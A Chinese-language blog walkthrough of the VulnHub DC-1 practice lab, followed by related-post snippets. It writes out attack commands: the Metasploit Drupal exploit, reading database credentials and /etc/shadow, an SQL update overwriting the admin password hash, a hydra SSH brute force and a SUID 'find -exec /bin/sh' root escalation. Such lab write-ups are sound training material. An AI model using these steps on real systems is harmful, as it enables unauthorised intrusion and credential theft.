DC-1靶场渗透

于 2024-12-10 19:47:26 发布
阅读量550 收藏 11
点赞数 23
CC 4.0 BY-SA版权
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Tiny_Hacker/article/details/144381664

主机发现

通过下面的命令来发现dc-1靶机的IP地址

arp-scan -l

其中192.168.1.125就是dc-1的IP

接着使用nmap对这个ip进行扫描

nmap -A -p- 192.168.1.125

扫描发现该ip开放了22,80,111这几个端口

漏洞分析

其中80端口开放了一个http类的web网页,接着用浏览器访问这个80端口

发现是一个drupal site,进过信息搜集,发现这是一个通过php编写的开源内容管理框架,是一个附带cms的php开发框架

漏洞利用

并且可以在kali中的msf搜索到这个框架漏洞,接着启动msfconsole,然后启动成功后搜索drupal这个框架的漏洞

接着利用use来使用序好号1这个框架漏洞的脚本,顺便查看一下这个脚本的参数信息

image-20241119185253212

参数信息中只需要配置rhosts,然后再运行

通过python中的pty来对命令行进行具体化

python -c 'import pty;pty.spawn("/bin/bash")'

flag1

发现了flag1

进行读取后,说每个cms都需要一个配置文件,因此,要查看配置文件,在一遍遍的目录遍历中看到了配置文件

接着进行读取,在文件开头发现了mysql数据库的登录密码和账号,甚至还有数据库名

flag2

并且在这个setting中发现了flag2

暴力破解和字典攻击并不是获得访问权限的唯一方法(您将需要访问权限)。您可以使用这些凭据做什么?

大概意思就是要我们进行提权,才能获得一些信息

连接数据库

接着使用该用户名和密码进行连接数据库

mysql -udbuser -pR0ck3t;

登录成功,接着看给出提到的数据库名

use drupaldb;
show tables;

列出drupaldb下的数据表后,发现了一个users表,进行查看

select * from users;

发现这个表中的pass都是经过hash加密的,很难破解,可以尝试自己生成一个经过hash加密的密码,再进行登陆

exit(退出数据库)
cd /var/www 返回最开始的目录
php scripts/passwod-hash.hash (root)--->自己的密码

先重复之前查看users表的操作,再接着用刚设置的密码进行登陆

update users set pass="$S$DkdKoDM3LYlch2HnKOplK/Fearq/.KlX6aO/WseXfy2HepVvzwA1" where uid=1;

然后我们就可以通过这个密码,在浏览器中进行登陆了

进行登陆

根据刚才的密码进行登陆

flag3

在一顿操作下发现了flag3

查看这个flag3

这句话就passwd和shadow有作用,在linux中这两个内容放到了/etc下

flag4

第一个:提权

接着进行访问

/etc/passwd
/etc/shadow

有flag4这个用户,但是需要进行爆破,或者是提权才能拿到flag4

尝试直接读取flag4

cat /home/flag4/flag4.txt

提示我们要用root用户才可以读取

find / -perm -4000

接着用find查找有没有可以进行提权的内容

发现可以通过ssh进行登陆,接着进行提权操作

find ./misc -exec "/bin/sh" \;

现在我们已经是root权限了

第二种:暴力破解

Kali自带的一个hydra软件可以对目标内容进行爆破

hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.125 ssh -vV -f

其中-l表示指定爆破的用户,-P表示指定使用哪个密码字典,ip为DC1的ip,因为flag4可以进行ssh连接,所以利用ssh协议做爆破。

爆出了密码为orange,进行ssh连接

ssh flag4@192.168.1.125

也需要进行提权

重复第一步的命令即可,利用下面的命令进行提权

find / -perm -4000 2>/dev/null
find -exec /bin/sh \;

flag5

进入到root目录中,ls后发现了最后的flag,接着cat读取

cat thefinalflag.txt

Tidy_Nan
关注
渗透测试综合靶场 DC-1 通关详解
goldfish8848的博客
09-18 1890
我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap(网络映射器)是一款开源的网络扫描和安全审计工具,它可以用来发现网络上的设备,检测开放的端口,确定运行在网络设备上的服务及其版本信息,以及检测潜在的安全漏洞。常用nmap命令:nmap -sn 目标IP地址:快速扫描目标网络,仅用于主机发现,不扫描端口。nmap -sn 目标IP地址/24:扫描整个C类子网。nmap 目标IP地址:扫描目标IP地址上的常见端口。nmap -p 端口号 目标IP地址:扫描特定端口。
DC-1靶场渗透测试
qq_41567985的博客
11-15 174
DC-1靶场总体感觉下来并不难,如果是为了拿到shell的话,在刚进去就可以使用find了,但是跟着flag的提示来才更有趣,也学到了很多东西。一般看到这种首页是大英文的,一般都是什么服务或者是中间件,这里是Drupal Site,我们去搜索一下,了解了解。使用find /var/www -name *config* 2> /dev/null。在/home下发现flag4,猜测flag是flag1、flag2、flag3、flag4。一般的高版本是没有啥漏洞的,但是旧版本依旧存在漏洞。
DC-1靶场通关详解
j206923的博客
09-13 1798
在linux中有很多类型的shell,不同的shell具备不同的功能,shell还决定了脚本中函数的语法,Linux中默认的shell是/bash/bash,流行的shell有ash、bash、ksh、csh、zsh等,不同的shell都有自己的特点以及用途。切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效。
实战项目 1 Linux-Drupal靶场渗透测试案例详解
m0_50572593的博客
06-21 1728
首先,通过搭建 Kali Linux 环境和扫描网络段获取靶机信息,确定了目标网站运行的 Drupal CMS,并利用 Metasploit 框架中的漏洞模块(如Drupalgeddon2)进行漏洞利用。随后,成功获取了对靶机的 shell 访问权限,并通过查找配置文件和数据库密码,逐步提升了系统权限。最终,通过 SSH 登录和特权文件的查找,成功获取了靶场中隐藏的多个 flag,完成了渗透测试任务。
VulnHub-DC-1靶机
weixin_52710247的博客
10-18 953
VulnHub-DC-1靶机详细渗透过程
DC-1靶机渗透测试记录
Jach1n
10-09 1382
DC-1靶机渗透测试记录
靶机DC-1
weixin_43847235的博客
11-14 474
靶机:DC-1 靶机介绍 vulnhub 环境 攻击机器:debian kali发行版 使用工具 arp-scan metasploit hydra john the ripper 开始测试 打开靶机。 因为靶机与攻击机在同一网络内,所以使用kali上的arp-scan进行扫描。 测试一下发现192.168.56.101就是靶机的ip。 访问该ip, 看到页面上有"Drupal Site"的...
DC靶场系列-DC1靶场-渗透测试靶场
最新发布
03-09
DC-1靶场.zip文件则是一个压缩包文件,包含了DC1靶场的完整环境和必要的资源文件,供测试者下载并使用。通过模拟实际渗透测试的工作环境,测试者可以在此环境下尝试各种渗透测试技术,如SQL注入、跨站脚本攻击(XSS)...
DC-1靶场渗透实验
Alashan12的博客
05-05 2118
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
DC系列靶场---DC 1靶场渗透测试(一)
zhouA0221的博客
07-17 1669
也就是提示我们去查看这个CMS的配置文件。因为Drupal是开源的所以我们是可以通过搜索引擎搜到配置文件的路径的。我们的思路可以从官方文档中查找一些关于drupal7的密码恢复之类的文件。这里用户有两个用户,我们只需要关注admin这个用户,这个应该是网站管理员的账户和密码。我们已经成功登录到目标主机的mysql数据库了,我们看一下数据库中有哪些重要的信息。看到这是flag2,从flag2中我们可以看到这是mysql的账号和密码。看到一个users的数据表,这个表中我们通过名字应该能猜测到这个是用户表。
DC-1靶场搭建及渗透
weixin_55772865的博客
06-13 754
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
vulnhub靶机DC-1
cyzCc的博客
02-15 1129
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
DC系列漏洞靶场-渗透测试学习复现(DC-1
W983079520的博客
11-01 2990
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
渗透靶机测试--billu_b0x2--学习笔记
Sacrifice_li的博客
05-14 1009
最近找了几个渗透靶机来玩玩,主要目的是为了获取root权限。这次的靶机名字是billu_b0x2,下载地址 攻击机ip:192.168.6.128 靶机 ip:192.168.6.132 1.打开目标靶机,正常用nmap扫描一下目标靶机的ip, 使用命令 nmap -sP 192.168.6.0/24 可以找到目标靶机的ip地址为192.168.6.132 2.寻找靶机开放端口 使用命令 nmap -p- -A -T4 192...
【废了-准备删除01渗透测试靶机搭建——基于WAMP的drupal7.x管理系统
Fighting_hawk的博客
03-22 4661
1. 本节主要是为后续进行渗透测试实验准备好靶机平台。
[渗透测试][Kali]对DC-1靶机进行渗透测试
多皮哦的博客
07-15 3938
1.搭建渗透平台 2.准备工作 3.扫描端口 4.使用msfconsole扫描网站目录 5.在msfconsole中查询并尝试针对Drupal的工具 6.数据库操作 7.从网页登陆admin账户 8. 得到flag3之后的操作 9. 使用find命令提升权限
【vulnhub】【DC系列】DC1-Drupal 靶机
Nicky_Zheng的博客
01-26 521
1、信息收集 1.1、端口扫描 使用nmap对端口进行扫描,发现存在 80 端口开放,使用的 CMS 为 Drupal 7 (来自查看主页源代码) 1.2、漏洞信息收集 searchsploit发现 Drupal 7 存在 SQL 注入等漏洞,本次先使用 SQL 注入添加管理员账号 kali@kali:~$ searchsploit Drupal 7.0 ----------------------------------------------------------------------------
DC靶场1-6
qq_42133828的博客
09-16 2948
靶机下载: https://download.vulnhub.com/dc/ 环境配置: 在VM以net连接打开虚拟机 使用的机器: 攻击机:kali linux 靶机DC1,2,4,5,6(IP随配) DC1 1.nmap扫描端口 nmap -sS -A 192.168.119.135 2. 访问页面,收集信息 http://192.168.119.135:80 ...
DC7_靶场实战
JSH_CDX的博客
03-30 1507
DC7_靶场实战 我只是知识的搬运工 希望看完这篇博文你能解决问题
Linux DC-2 靶场渗透测试风险规避(漏洞修复建议)
12-07
在进行Linux DC-2靶场渗透测试后,为了确保系统的安全性,需要对发现的漏洞进行修复。以下是一些常见的漏洞修复建议: 1. **更新系统和软件包**: - 定期更新操作系统和所有安装的软件包,以修补已知的安全漏洞。 - 使用包管理工具(如`apt`或`yum`)进行更新: ```bash sudo apt update && sudo apt upgrade -y ``` 2. **禁用不必要的服务**: - 关闭系统中不必要的服务和端口,减少攻击面。 - 使用`systemctl`命令管理服务: ```bash sudo systemctl disable <service_name> sudo systemctl stop <service_name> ``` 3. **配置防火墙**: - 设置防火墙规则,只允许必要的流量通过。 - 使用`ufw`或`iptables`配置防火墙: ```bash sudo ufw allow <port>/<protocol> sudo ufw enable ``` 4. **强化SSH配置**: - 禁用root用户远程登录。 - 更改默认SSH端口。 - 使用密钥认证而不是密码认证。 - 编辑`/etc/ssh/sshd_config`文件: ```bash PermitRootLogin no Port <new_port> PasswordAuthentication no ``` 5. **设置强密码策略**: - 强制用户设置复杂密码,并定期更换。 - 使用`pam_cracklib`或`pam_pwquality`模块配置密码策略: ```bash sudo apt install libpam-pwquality sudo vi /etc/pam.d/common-password ``` 6. **安装和配置入侵检测系统(IDS)**: - 安装如`Fail2Ban`或`Snort`等工具,监控和阻止可疑活动。 - 配置`Fail2Ban`防止暴力破解: ```bash sudo apt install fail2ban sudo vi /etc/fail2ban/jail.local ``` 7. **日志监控和分析**: - 定期检查系统日志,监控异常活动。 - 使用工具如`Logwatch`或`Splunk`进行日志分析: ```bash sudo apt install logwatch sudo vi /etc/logwatch/conf/logwatch.conf ``` 8. **文件权限和所有权**: - 确保文件和目录的权限和所有权设置正确,防止未授权访问。 - 使用`chmod`和`chown`命令修改权限和所有权: ```bash sudo chmod 644 <file> sudo chown <user>:<group> <file> ``` 9. **数据备份和恢复**: - 定期备份重要数据,并测试恢复过程。 - 使用工具如`rsync`或`tar`进行备份: ```bash sudo rsync -av --delete /data /backup ``` 通过以上措施,可以有效降低Linux DC-2靶场渗透测试中暴露的风险,确保系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值